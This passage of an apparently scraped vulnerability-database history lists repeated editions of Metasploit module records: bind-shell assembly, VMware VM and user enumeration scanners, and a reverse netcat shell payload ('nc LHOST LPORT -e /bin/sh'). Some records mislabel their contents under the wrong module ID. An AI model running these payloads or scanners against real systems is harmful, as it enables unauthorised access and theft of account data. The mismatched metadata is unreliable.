newfd);\n ; dup2(clientfd, ...)\n\n pop ecx\t\t\t; pop the sockfd integer to use as the loop counter ecx\n xchg ebx, eax\t\t; swapping registers values to put the accepted sockfd (client) in ebx as argument in next syscall (dup2)\n\n dup_loop:\n push 63\t\t\t; syscall 63 - dup2\n pop eax\n int 0x80\t\t; kernel interrupt\n\n dec ecx\t\t\t; file descriptor and loop counter\n jns dup_loop\n\n ; Finally, using execve to substitute the actual process with /bin/sh\n ; int execve(const char *filename, char *const argv[], char *const envp[]);\n ; exevcve(\"/bin/sh\", NULL, NULL)\n\n mov al, 11\t\t; execve syscall\n\n ; execve string argument\n ; stack already contains NULL on top\n push 0x68732f2f\t\t; \"//sh\"\n push 0x6e69622f\t\t; \"/bin\"\n\n mov ebx, esp\t\t; ptr to \"/bin//sh\" string\n\n inc ecx\t\t\t; zero to argv\n ; zero to envp (edx)\n\n int 0x80\n EOS\n end\n\n Metasm::Shellcode.assemble(Metasm::X86.new, payload).encode_string\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-04T06:12:29", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-04T08:08:40", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-07-04T08:08:40"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891843", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310108609", "OPENVAS:1361412562310108610", "OPENVAS:1361412562310704475", "OPENVAS:1361412562310891842", "OPENVAS:1361412562310142531", "OPENVAS:1361412562310142532", "OPENVAS:1361412562310142530"]}, {"type": "thn", "idList": ["THN:2BD68EA7A6F1DB646F87AC8DC550B295"]}, {"type": "zdt", "idList": ["1337DAY-ID-32936", "1337DAY-ID-32947", "1337DAY-ID-32941", "1337DAY-ID-32949", "1337DAY-ID-32930", "1337DAY-ID-32933", "1337DAY-ID-32946", "1337DAY-ID-32944", "1337DAY-ID-32938", "1337DAY-ID-32945"]}], "modified": "2019-07-04T08:08:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-04T08:08:40", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "3158100985ba9b2b5d046de8ce2105f5", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T04:30:20", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2019-07-10T04:30:20"}, "dependencies": {"references": [{"type": "xen", "idList": ["XSA-300"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891849", "OPENVAS:1361412562310704477", "OPENVAS:1361412562310891846", "OPENVAS:1361412562310891845", "OPENVAS:1361412562310891847", "OPENVAS:1361412562310704476", "OPENVAS:1361412562310891844", "OPENVAS:1361412562310112599", "OPENVAS:1361412562310112598", "OPENVAS:1361412562310113423"]}, {"type": "ubuntu", "idList": ["USN-4048-1", "USN-4038-4"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32954"]}], "modified": "2019-07-10T04:30:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T04:30:20", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T07:54:26", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2019-07-10T07:54:26"}, "dependencies": {"references": [{"type": "xen", "idList": ["XSA-300"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891849", "OPENVAS:1361412562310704477", "OPENVAS:1361412562310891845", "OPENVAS:1361412562310891847", "OPENVAS:1361412562310891846", "OPENVAS:1361412562310704476", "OPENVAS:1361412562310891844", "OPENVAS:1361412562310112599", "OPENVAS:1361412562310113423", "OPENVAS:1361412562310883077"]}, {"type": "ubuntu", "idList": ["USN-4048-1", "USN-4038-4"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32954"]}], "modified": "2019-07-10T07:54:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T07:54:26", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "f7d57822e733fcfadb1929bc7cd41895", "type": "metasploit", "bulletinFamily": "exploit", "title": "Unix Command Shell, Reverse TCP (via netcat -e)", "description": "Creates an interactive shell via netcat\n", "published": "2013-03-11T17:04:22", "modified": "2018-08-23T23:00:02", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T22:28:38", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-07-10T22:28:38"}, "dependencies": {"references": [{"type": "xen", "idList": ["XSA-300"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142568", "OPENVAS:1361412562310891849", "OPENVAS:1361412562310142569", "OPENVAS:1361412562310704477", "OPENVAS:1361412562310891846", "OPENVAS:1361412562310891847", "OPENVAS:1361412562310891845", "OPENVAS:1361412562310704476", "OPENVAS:1361412562310891844", "OPENVAS:1361412562310112599"]}, {"type": "ubuntu", "idList": ["USN-4048-1", "USN-4038-4"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32956", "1337DAY-ID-32954"]}], "modified": "2019-07-10T22:28:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 34\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse TCP (via netcat -e)',\n 'Description' => 'Creates an interactive shell via netcat',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'netcat-e',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + command_string\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n \"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh\"\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T22:28:38", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-11T00:26:25", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2019-07-11T00:26:25"}, "dependencies": {"references": [{"type": "xen", "idList": ["XSA-300"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142568", "OPENVAS:1361412562310891849", "OPENVAS:1361412562310142569", "OPENVAS:1361412562310704477", "OPENVAS:1361412562310891847", "OPENVAS:1361412562310891845", "OPENVAS:1361412562310891846", "OPENVAS:1361412562310704476", "OPENVAS:1361412562310891844", "OPENVAS:1361412562310112599"]}, {"type": "ubuntu", "idList": ["USN-4048-1", "USN-4038-4"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32956", "1337DAY-ID-32954"]}], "modified": "2019-07-11T00:26:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-11T00:26:25", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "0fa3bba9c67c799d0624cdb6c9d84db9", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate User Accounts", "description": "This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.\n", "published": "2012-02-16T04:55:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-21T03:04:37", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2019-07-21T03:04:37"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310142622", "OPENVAS:1361412562310113443", "OPENVAS:1361412562310142623", "OPENVAS:1361412562310113445", "OPENVAS:1361412562310704483", "OPENVAS:1361412562310113444", "OPENVAS:1361412562310112608", "OPENVAS:1361412562310891854", "OPENVAS:1361412562310876578", "OPENVAS:1361412562310108612"]}, {"type": "threatpost", "idList": ["THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "kitploit", "idList": ["KITPLOIT:7514230884795260674"]}, {"type": "cve", "idList": ["CVE-2019-13603"]}], "modified": "2019-07-21T03:04:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_users.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate User Accounts',\n 'Description' => %Q{\n This module will log into the Web API of VMWare and try to enumerate\n all the user accounts. If the VMware instance is connected to one or\n more domains, it will try to enumerate domain users as well.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ])\n ])\n end\n\n\n def run_host(ip)\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n # Get local Users and Groups\n user_list = vim_get_user_list(nil)\n tmp_users = Rex::Text::Table.new(\n 'Header' => \"Users for server #{ip}\",\n 'Indent' => 1,\n 'Columns' => ['Name', 'Description']\n )\n tmp_groups = Rex::Text::Table.new(\n 'Header' => \"Groups for server #{ip}\",\n 'Indent' => 1,\n 'Columns' => ['Name', 'Description']\n )\n unless user_list.nil?\n case user_list\n when :noresponse\n print_error \"Received no response from #{ip}\"\n when :expired\n print_error \"The login session appears to have expired on #{ip}\"\n when :error\n print_error \"An error occurred while trying to enumerate the users for #{domain} on #{ip}\"\n else\n user_list.each do |obj|\n if obj['group'] == 'true'\n tmp_groups << [obj['principal'], obj['fullName']]\n else\n tmp_users << [obj['principal'], obj['fullName']]\n end\n end\n print_good tmp_groups.to_s\n store_loot('host.vmware.groups', \"text/plain\", datastore['RHOST'], tmp_groups.to_csv , \"#{datastore['RHOST']}_esx_groups.txt\", \"VMWare ESX User Groups\")\n print_good tmp_users.to_s\n store_loot('host.vmware.users', \"text/plain\", datastore['RHOST'], tmp_users.to_csv , \"#{datastore['RHOST']}_esx_users.txt\", \"VMWare ESX Users\")\n end\n end\n\n # Enumerate Domains the Server is connected to\n esx_domains = vim_get_domains\n case esx_domains\n when :noresponse\n print_error \"Received no response from #{ip}\"\n when :expired\n print_error \"The login session appears to have expired on #{ip}\"\n when :error\n print_error \"An error occurred while trying to enumerate the domains on #{ip}\"\n else\n # Enumerate Domain Users and Groups\n esx_domains.each do |domain|\n tmp_dusers = Rex::Text::Table.new(\n 'Header' => \"Users for domain #{domain}\",\n 'Indent' => 1,\n 'Columns' => ['Name', 'Description']\n )\n\n tmp_dgroups = Rex::Text::Table.new(\n 'Header' => \"Groups for domain #{domain}\",\n 'Indent' => 1,\n 'Columns' => ['Name', 'Description']\n )\n\n user_list = vim_get_user_list(domain)\n case user_list\n when nil\n next\n when :noresponse\n print_error \"Received no response from #{ip}\"\n when :expired\n print_error \"The login session appears to have expired on #{ip}\"\n when :error\n print_error \"An error occurred while trying to enumerate the users for #{domain} on #{ip}\"\n else\n user_list.each do |obj|\n if obj['group'] == 'true'\n tmp_dgroups << [obj['principal'], obj['fullName']]\n else\n tmp_dusers << [obj['principal'], obj['fullName']]\n end\n end\n print_good tmp_dgroups.to_s\n\n f = store_loot('domain.groups', \"text/plain\", datastore['RHOST'], tmp_dgroups.to_csv , \"#{domain}_esx_groups.txt\", \"VMWare ESX #{domain} Domain User Groups\")\n vprint_status(\"VMWare domain user groups stored in: #{f}\")\n print_good tmp_dusers.to_s\n f = store_loot('domain.users', \"text/plain\", datastore['RHOST'], tmp_dgroups.to_csv , \"#{domain}_esx_users.txt\", \"VMWare ESX #{domain} Domain Users\")\n vprint_status(\"VMWare users stored in: #{f}\")\n end\n end\n end\n else\n print_error \"Login failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T03:04:37", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-21T05:30:17", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-07-21T05:30:17"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310113443", "OPENVAS:1361412562310142622", "OPENVAS:1361412562310113445", "OPENVAS:1361412562310142623", "OPENVAS:1361412562310113444", "OPENVAS:1361412562310704483", "OPENVAS:1361412562310891854", "OPENVAS:1361412562310112608", "OPENVAS:1361412562310876578", "OPENVAS:1361412562310108612"]}, {"type": "threatpost", "idList": ["THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "kitploit", "idList": ["KITPLOIT:7514230884795260674"]}, {"type": "cve", "idList": ["CVE-2019-13603"]}], "modified": "2019-07-21T05:30:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T05:30:17", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "2da041234ba382b094c2c7da499cc83b", "type": "metasploit", "bulletinFamily": "exploit", "title": "VxWorks WDB Agent Boot Parameter Scanner", "description": "Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory\n", "published": "2010-08-02T05:56:26", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html"], "cvelist": [], "lastseen": "2019-07-23T01:00:03", "history": [], "viewCount": 8, "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2019-07-23T01:00:03"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6666619513896093313"]}, {"type": "threatpost", "idList": ["THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4"]}, {"type": "securelist", "idList": ["SECURELIST:CEB20E04B2F37A8904406C3A811BCF8B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112610", "OPENVAS:1361412562310891859", "OPENVAS:1361412562310891858", "OPENVAS:1361412562310891857", "OPENVAS:1361412562310704484", "OPENVAS:1361412562310891855", "OPENVAS:1361412562310891856", "OPENVAS:1361412562310142632", "OPENVAS:1361412562310142633", "OPENVAS:1361412562310142631"]}], "modified": "2019-07-23T01:00:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < 